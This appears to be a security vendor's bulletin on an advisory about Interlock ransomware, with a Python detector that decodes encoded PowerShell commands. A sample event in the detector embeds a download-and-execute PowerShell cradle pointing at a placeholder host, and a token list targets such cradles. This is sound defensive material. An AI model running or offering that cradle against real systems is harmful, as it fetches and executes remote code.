CISA and FBI Issue Joint Warning on Interlock Ransomware Targeting Critical Infrastructure
July 23rd, 2025
High

Our Cyber Threat Intelligence Unit is closely monitoring activity linked to the Interlock ransomware group, as outlined in a joint advisory issued by CISA, FBI, HHS, and MS-ISAC. Active since September 2024, Interlock is a financially motivated threat actor targeting organizations across North America and Europe. The group uses a double extortion model, encrypting systems and exfiltrating sensitive data to coerce victims into paying ransoms. Interlock actors leverage uncommon initial access vectors, including drive-by downloads from compromised legitimate websites, and a social engineering technique known as “ClickFix,” which deceives users into executing malicious payloads disguised as important system fixes or browser updates.
Technical Details
Threat Actor: Interlock Ransomware Group
Severity: High
Targeted Sectors: Critical Infrastructure, Healthcare, Education, Government, Manufacturing
Attack Type: Double Extortion Ransomware
Initial Access Vectors:
Drive-by downloads from compromised legitimate websites
“ClickFix” technique, which lures users into executing fake browser updates or system fixes.
Attack Chain Characteristics:
Execution: Base64-encoded PowerShell scripts launched through user interaction
Persistence: Deployment of custom Remote Access Trojans (RATs) for long-term access
Credential Access: Credential dumping and privilege escalation via known tools and techniques
Lateral Movement: Remote Desktop Protocol (RDP) exploitation and internal network discovery
Impact: File encryption on Windows and Linux systems, including virtualized environments
Exfiltration: Data theft conducted prior to encryption to maximize extortion leverage

Impact
The Interlock ransomware campaign poses a significant threat to business operations, data security, and public trust. Affected organizations face both technical and reputational consequences. Key impacts include:
Operational Disruption: Encrypting critical systems leads to downtime, service outages, and reduced functionality.
Data Breaches: Exfiltrated information often contains sensitive personally identifiable information (PII), protected health information (PHI), and proprietary corporate data.
Financial Loss: Victims might face significant expenses from ransom payments, forensic investigations, and recovery efforts.
Reputational Damage: Publicly disclosing a breach can erode stakeholder confidence and customer trust.
Regulatory Consequences: Compromised data could cause violations of HIPAA, GDPR, or other relevant data protection laws.
A notable example occurred in May 2025, when Interlock targeted Kettering Health, disrupting operations across 14 hospitals and more than 120 clinics.
Detection Method
Detecting Interlock ransomware activity requires a layered monitoring approach that encompasses endpoints, network traffic, user behavior, and system integrity. Organizations should implement the following strategies:
PowerShell Monitoring:
Detect use of Base64-encoded PowerShell commands.
Alert on script execution from unusual or temporary directories.
Web Traffic Analysis:
Monitor access to known malicious domains impersonating browser or system updates.
Use DNS filtering and proxy logs to detect suspicious traffic.
Endpoint Detection:
Detect creation of new or unauthorized scheduled tasks or services.
Monitor for file encryption patterns and abnormal file renaming patterns.
Network Behavior Monitoring:
Identify outbound connections to known or suspicious command-and-control (C2) infrastructure.
Flag signs of DNS tunneling or data exfiltration attempts.
RAT Activity Detection:
Monitor for persistence mechanisms such as registry modifications and auto-start entries.
Use EDR solutions to detect behaviors consistent with known Remote Access Trojans.
Credential Dumping Indicators:
Alert on LSASS access or execution of tools like Mimikatz.
Monitor for abnormal authentication patterns.
Lateral Movement Detection:
Watch for RDP or WMI connections from non-standard hosts.
Detect PsExec usage across the network.
File Integrity Monitoring (FIM): Track unauthorized changes to system files or backups.
SIEM Correlation Rules: Correlate login anomalies, encryption events, and outbound traffic.
User Behavior Analytics (UBA): Detect deviations in user behavior, such as unusual access or script execution.
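As an added illustration of the PowerShell Monitoring and Execution items above (example code, not part of the advisory), the following Python triages process-creation events: it decodes the UTF-16LE Base64 payload behind PowerShell's -EncodedCommand switch, flags scripts run from temporary directories, and notes when the parent is a user shell or browser. Field names follow Sysmon process-creation conventions; the parent-process list and all sample events are constructed assumptions.

```python
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
TEMP_DIR_HINTS = ("\\temp\\", "\\tmp\\", "\\appdata\\local\\temp\\", "\\downloads\\")
# Assumed parents indicating user interaction (e.g. a pasted "fix" or fake update).
USER_PARENTS = ("explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe")
DOWNLOAD_CRADLE_TOKENS = ("downloadstring", "invoke-webrequest", "iex")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries a Base64 payload, else None."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before Base64-encoding it.
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"

def analyze_event(event: Dict[str, str]) -> List[str]:
    """Return detection reasons for one process-creation event (empty list = nothing flagged)."""
    reasons: List[str] = []
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    is_powershell = image.endswith(("powershell.exe", "pwsh.exe"))
    decoded = decode_encoded_command(cmdline) if is_powershell else None
    if decoded is not None:
        reasons.append("encoded-powershell")
        if any(tok in decoded.lower() for tok in DOWNLOAD_CRADLE_TOKENS):
            reasons.append("download-cradle")
    if any(hint in cmdline.lower() for hint in TEMP_DIR_HINTS):
        reasons.append("temp-dir-script")
    if is_powershell and parent.endswith(USER_PARENTS):
        reasons.append("user-launched")
    return reasons

# Constructed sample events (not real telemetry); the payload is built inline so it decodes.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/update.ps1')"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc "
                    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -File C:\Users\bob\AppData\Local\Temp\update.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"powershell.exe -File C:\ProgramData\Inventory\collect.ps1"},
]
```

Feeding real Sysmon Event ID 1 or Windows 4688 records into analyze_event only requires mapping their fields to the Image, ParentImage and CommandLine keys.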
Indicators of Compromise

Recommendations
Patch Management: Keep OS, software, and firmware up to date.
User Awareness: Train users to recognize fake browser updates and phishing attempts.
Network Segmentation: Isolate critical systems to limit lateral movement.
Multi-Factor Authentication (MFA): Enforce MFA across all services.
Backup Strategy: Maintain offline, encrypted backups and test recovery procedures.
ICAM Policies: Implement strong identity, credential, and access management.
Threat Intelligence Integration: Use CISA-provided IOCs to enhance detection.
Conclusion
The Interlock ransomware campaign highlights the increasing sophistication of financially motivated threat actors. By combining deceptive social engineering techniques with advanced persistence mechanisms, Interlock actors pose a sustained threat to organizations across multiple sectors. Defending against this threat requires a layered security approach that integrates technical safeguards, user awareness, and continuous monitoring to mitigate the risk of ransomware attacks. Leveraging threat intelligence and collaborating with agencies like CISA is essential to staying ahead of ransomware operations.